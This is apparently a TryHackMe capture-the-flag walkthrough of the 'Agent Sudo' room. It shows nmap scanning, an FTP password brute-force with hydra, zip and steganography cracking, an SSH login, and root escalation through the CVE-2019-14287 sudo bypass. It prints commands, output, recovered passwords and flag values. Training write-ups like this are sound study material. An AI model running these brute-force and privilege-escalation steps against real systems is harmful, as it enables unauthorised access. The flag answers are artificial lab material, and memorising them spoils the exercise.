tryhackme.com - © TryHackMe
🎯 Target IP: 10.10.62.30
Create a directory for machine on the Desktop and a directory containing the scans with nmap.
su
echo "10.10.62.30 agent_sudo.thm" >> /etc/hosts
mkdir thm/agent_sudo.thm
cd thm/agent_sudo.thm
# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hostsI prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.
ping -c 3 agent_sudo.thm
PING agent_sudo.thm (10.10.62.30) 56(84) bytes of data.
64 bytes from agent_sudo.thm (10.10.62.30): icmp_seq=1 ttl=63 time=132 ms
64 bytes from agent_sudo.thm (10.10.62.30): icmp_seq=2 ttl=63 time=81.8 ms
64 bytes from agent_sudo.thm (10.10.62.30): icmp_seq=3 ttl=63 time=123 msSending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix system (probably Linux), while Windows systems usually have a TTL of 128 secs.
nmap --open -n -Pn -vvv -T4 agent_sudo.thm Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-02 14:49 EDT
Warning: Hostname agent_sudo.thm resolves to 2 IPs. Using 10.10.62.30.
Initiating SYN Stealth Scan at 14:49
Scanning agent_sudo.thm (10.10.80.70) [1000 ports]
Discovered open port 80/tcp on 10.10.62.30
Discovered open port 22/tcp on 10.10.62.30
Discovered open port 21/tcp on 10.10.62.30
Completed SYN Stealth Scan at 14:49, 1.15s elapsed (1000 total ports)
Nmap scan report for agent_sudo.thm (10.10.62.30)
Host is up, received user-set (0.078s latency).
Other addresses for agent_sudo.thm (not scanned): 10.10.62.30
Scanned at 2023-07-02 14:49:50 EDT for 1s
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63| command | result |
|---|---|
| sudo | run as root |
| sC | run default scripts |
| sV | enumerate versions |
| A | aggressive mode |
| T4 | run a bit faster |
| oN | output to file with nmap formatting |
nmap -p21,22,80 -sCV -vvv -T4 agent_sudo.thmPORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5hdrxDB30IcSGobuBxhwKJ8g+DJcUO5xzoaZP/vJBtWoSf4nWDqaqlJdEF0Vu7Sw7i0R3aHRKGc5mKmjRuhSEtuKKjKdZqzL3xNTI2cItmyKsMgZz+lbMnc3DouIHqlh748nQknD/28+RXREsNtQZtd0VmBZcY1TD0U4XJXPiwleilnsbwWA7pg26cAv9B7CcaqvMgldjSTdkT1QNgrx51g4IFxtMIFGeJDh2oJkfPcX6KDcYo6c9W1l+SCSivAQsJ1dXgA2bLFkG/wPaJaBgCzb8IOZOfxQjnIqBdUNFQPlwshX/nq26BMhNGKMENXJUpvUTshoJ/rFGgZ9Nj31r
| 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHdSVnnzMMv6VBLmga/Wpb94C9M2nOXyu36FCwzHtLB4S4lGXa2LzB5jqnAQa0ihI6IDtQUimgvooZCLNl6ob68=
| 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOL3wRjJ5kmGs/hI4aXEwEndh81Pm/fvo8EvcpDHR5nt
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-title: 400 Bad Request
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelIt looks like there are three open ports on the machine: 21, 22, 80.
{% hint style="info" %} user-agent {% endhint %}
We can see our user-agent using dev mode (F12)
We say that the correct user-agent is a capital letter, than using BurpSuite we can test all alphabet
{% file src="../.gitbook/assets/user-agent_burp_suite.webm" %}
We need to set user-agent to 'C' and we can see agent name.
For this thing, we can use a firefox extension: User-Agent Switcher and Manager
setting user-agent to 'C'
Refreshing page we see agent name:
http://10.10.89.63/agent_C_attention.php
{% hint style="info" %} chris {% endhint %}
We knwo a username: chris, then, we can use hydra to find psw:\
hydra -l chris -P /usr/share/wordlists/rockyou.txt agent_sudo.thm ftpHydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-02 18:24:07
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://agent_sudo.thm:21/
[STATUS] 244.00 tries/min, 244 tries in 00:01h, 14344155 to do in 979:48h, 16 active
[21][ftp] host: agent_sudo.thm login: chris password: crystal
1 of 1 target successfully completed, 1 valid password found
{% hint style="info" %} crystal {% endhint %}
chris::crystal
It's time to access with ftp credentials:\
ftp agent_sudo.thm
Connected to agent_sudo.thm.
220 (vsFTPd 3.0.3)
Name (agent_sudo.thm:kali): chris
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||10070|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png
226 Directory send OK.ftp> get To_agentJ.txt
local: To_agentJ.txt remote: To_agentJ.txt
229 Entering Extended Passive Mode (|||54801|)
150 Opening BINARY mode data connection for To_agentJ.txt (217 bytes).
100% |***********************************************************************************| 217 43.31 KiB/s 00:00 ETA
226 Transfer complete.
217 bytes received in 00:00 (3.08 KiB/s)cat To_agentJ.txt Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From, Agent C
It surely means that we're talking about steganography, then, we download all photos with get command.
exiftool cute-alien.jpgExifTool Version Number : 12.63
File Name : cute-alien.jpg
Directory : .
File Size : 33 kB
File Modification Date/Time : 2019:10:29 08:22:37-04:00
File Access Date/Time : 2023:07:02 18:55:15-04:00
File Inode Change Date/Time : 2023:07:02 18:55:15-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 96
Y Resolution : 96
Image Width : 440
Image Height : 501
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 440x501
Megapixels : 0.220exiftool cutie.pngExifTool Version Number : 12.63
File Name : cutie.png
Directory : .
File Size : 35 kB
File Modification Date/Time : 2019:10:29 08:33:51-04:00
File Access Date/Time : 2023:07:02 18:55:22-04:00
File Inode Change Date/Time : 2023:07:02 18:55:22-04:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 528
Image Height : 528
Bit Depth : 8
Color Type : Palette
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Palette : (Binary data 762 bytes, use -b option to extract)
Transparency : (Binary data 42 bytes, use -b option to extract)
Warning : [minor] Trailer data after PNG IEND chunk
Image Size : 528x528
Megapixels : 0.279These two informations are important:
Compression : Deflate/Inflate
Palette : (Binary data 762 bytes, use -b option to extract)
Then, we use flag -b to extract archive:
exiftool -b cutie.pngWarning: [minor] Trailer data after PNG IEND chunk - cutie.png
12.63cutie.png.348422019:10:29 08:33:51-04:002023:07:02 18:55:22-04:002023:07:02 18:55:22-04:00100644PNGPNGimage/png52852883000�����������������������������������������������������������������������������������������������������������������������������a���*EB��:����ϲ30p�.(CA��b+FB��8">;&@B&A>9RO =:#<A;8$@=96.)%>A��b��:&AA��:��e��c��]��9��_�`P��b4-HC��Z5NK�#▒��W���!:@t�-�ӵ0KG�����������Ͱ���r�-u�"6SB��?/KB�����6��G��������L��C2OB��ب�Z���CZWn�,Rhc��T9X@>VRMc^�ٻ����ꖞ�P��`H_[z�;��W��9l�,���Wli������j}z��])&��c���^rmGk>t�<Nq;��d��;���cwt������>\G��Z�����Ց����:������Q|?Be>>^>��\!EC��������Ј��u����\Y|M��������QsK}��o�~��X�����vEeHm�<��ƌ��a�=l�*x����mg�=$ ������`�2m�R�è]�>���a�OW�>h�0��/����ôf�PWw5���t�S��������°����PLlJ�����������i{n�:�"�˼}�|z�)[oa�������줃����I��Vx�T�����Aq�q��������W3D?y�5���}�U�aPAA=�>0�'��x�UF�.%sPHz6/|�nVE?e82��ȅ�ZM�UJ��N��D��
�(���0Θ�?E�LU8��]��eԹsxoj������[minor] Trailer data after PNG IEND chunk528 5280.278784 it's not a good solution, we can try another similar tool (binwalk):
binwalk -e cutie.pngDECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 528 x 528, 8-bit colormap, non-interlaced
869 0x365 Zlib compressed data, best compression
WARNING: Extractor.execute failed to run external extractor 'jar xvf '%e'': [Errno 2] No such file or directory: 'jar', 'jar xvf '%e'' might not be installed correctly
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txtls
34820 0x8804 End of Zip archive, footer length: 22ls -l
total 316
-rw-r--r-- 1 kali kali 279312 Jul 2 19:11 365
-rw-r--r-- 1 kali kali 33973 Jul 2 19:11 365.zlib
-rw-r--r-- 1 kali kali 280 Jul 2 19:11 8702.zip
-rw-r--r-- 1 kali kali 0 Oct 29 2019 To_agentR.txtSo we used “zip2john” to crack the zip file password:
zip2john 8702.zip > Output.txtAnd then we used John the Ripper to crack the hash:
john Output.txtUsing default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 78 for all loaded hashes
Will run 3 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
alien (8702.zip/To_agentR.txt)
1g 0:00:00:00 DONE 2/3 (2023-07-03 14:07) 1.063g/s 46195p/s 46195c/s 46195C/s 123456..Open
Use the "--show" option to display all of the cracked passwords reliably
Session completed. We've found the archive password:\
{% hint style="info" %} alien {% endhint %}
So we tried to extract the zip file but unzip command didn’t work so we used this command
7z e 8702.zip
ls
365 365.zlib 8702.zip Output.txt To_agentR_1.txt To_agentR.txt
cat To_agentR.txtAgent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By, Agent R
This word: QXJlYTUx can be an encoded psw,
we can use a web tool: https://gchq.github.io/CyberChef/#input=UVhKbFlUVXg or
echo 'QXJlYTUx' | base64 -d {% hint style="info" %} Area51 {% endhint %}
Reading last request (steg psw), we image that's the cute-alien.jpg steg password, then we use steghide to extract information:
steghide --extract -sf cute-alien.jpgEnter passphrase:
wrote extracted data to "message.txt".cat message.txtHi james,
Glad you find this message. Your login password is hackerrules!
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy, chris
{% hint style="info" %} James {% endhint %}
Reading message.txt, we know that the psw is:
{% hint style="info" %} hackerrules! {% endhint %}
ssh james@agent_sudo.thm
james@agent_sudo.thm's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)ls
Alien_autospy.jpg user_flag.txt
cat user_flag.txt 🚩 Flag 1 (flag.txt)
b03d975e8c92a7c04146cfa7a5a313c7
We need to find out where the image is from. You can use the command below to download the image from the machine and do a reverse image search on Google
scp james@10.10.62.30:Alien_autospy.jpg /home/We can do a reverse image search on this jpg using Google:
{% hint style="info" %} Roswell alien autopsy {% endhint %}
We can check the user's permissions by the following command:
sudo -l
Googling the result we find the following vulnerability:
In alternative we can retrieve sudo version and find it on searchsploit.\
{% hint style="info" %} CVE-2019-14287 {% endhint %}
We use this exploit to scale privileges:\
sudo -u#-1 /bin/bashWe're root!
whoami
root
cd /root
ls
root.txt
cat root.txt🚩 Flag 2 (root.txt)
b53a02f55b57d4439e3341834d70c062
Reading all message of root's flag, we can say the name of agent R:
To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
By, DesKel a.k.a Agent R
{% hint style="info" %} DesKel {% endhint %}